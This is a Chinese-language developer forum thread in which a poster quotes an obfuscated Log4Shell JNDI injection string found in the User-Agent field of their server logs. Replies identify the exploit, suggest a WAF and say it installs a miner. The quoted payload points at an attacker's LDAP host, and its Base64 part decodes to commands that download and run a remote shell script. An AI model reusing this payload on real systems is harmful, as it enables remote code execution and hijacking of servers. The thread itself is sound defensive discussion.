User-Agent 注入

2022-02-10 10:13:48 +08:00

kaka6

年前部署一个接口服务，通过日志，最近发现经常有 User-Agent 异常注入的访问其中一个比较诡异的内容：

t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')

知道这是干嘛的吗

3250 次点击

所在节点

程序员

11 条回复

ThirdFlame

2022-02-10 10:15:25 +08:00

log4shell

silverfox

2022-02-10 10:21:03 +08:00

https://www.bridewellconsulting.com/log4j-vulnerability-cve-2021-44228

zhazi

2022-02-10 10:22:30 +08:00

https://github.com/Mr-xn/JNDIExploit-1

maichaide

2022-02-10 11:03:53 +08:00

下载脚本开启探矿服务

muzuiget

2022-02-10 13:28:35 +08:00

Log4j 漏洞，就是赌你用 Log4j 把 UserAgent 记录到日志中，实现远程执行代码。

yundun2021

2022-02-10 13:34:59 +08:00

有条件可以上 WAF

yu1u

2022-02-10 13:47:12 +08:00

log4j 漏洞攻击

0x73346b757234

2022-02-10 18:04:25 +08:00

对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本，测了下自己的规则能覆盖，嘿嘿。

kaka6

2022-02-10 22:29:21 +08:00

@muzuiget 没有用 Log4j 就没事是吧，我是用 python 的 user_agents 记录

muzuiget

2022-02-10 23:18:08 +08:00

@kaka6 没用 Java 肯定没事，对方就是随机扫的。

kaka6

2022-02-17 09:33:19 +08:00

又收到不少的 User-Agent：
Go-http-client/1.1
python-requests/2.20.1
curl/7.75.0

而且还来自世界各地，以前没做这么细的记录，现在全网做记录，发现了不少莫明访客

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/832843

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.